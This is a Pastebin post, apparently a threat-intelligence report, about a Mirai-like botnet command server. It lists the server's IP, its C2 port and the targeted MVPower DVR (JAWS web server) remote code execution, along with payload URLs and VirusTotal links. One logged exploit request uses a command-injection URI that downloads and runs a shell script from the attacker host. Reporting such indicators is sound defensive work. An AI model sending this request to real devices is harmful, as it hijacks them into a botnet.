Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Active Mirai-like botnet C2 detected:
- 89.248.174.198 (IP Volume Inc 🇳🇱)
- C2 port:
- 9999/tcp
- Exploit attempts targeting:
- 60001/tcp (JAWS Web Server – MVPower DVR RCE)
- Exploit attempt:
- Source IP Method URI LastSeen
- 89.248.174.198 GET /shell?cd /tmp;wget http:/\x5C/89.248.174.198/jaws.sh -O - >smoke.sh;chmod 777 smoke.sh;sh smoke.sh 2019-07-18T00:48:23Z
- 89.248.174.198 GET /shell?/bin/busybox 2019-07-17T21:50:05Z
- Payload:
- http://89.248.174.198/jaws.sh
- arm (https://www.virustotal.com/gui/file/eeae01f4717f4d6248ee9e9e6d53d841c648e35259716dfe74cac630e15f1811/detection)
- arm7 (https://www.virustotal.com/gui/file/7d2f5f5efb4aa8e5dca543734829ac4eb9d89885d7e60aed6af4d35508ded21c/detection)
- Source:
- https://twitter.com/bad_packets/status/1151689264209391616
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement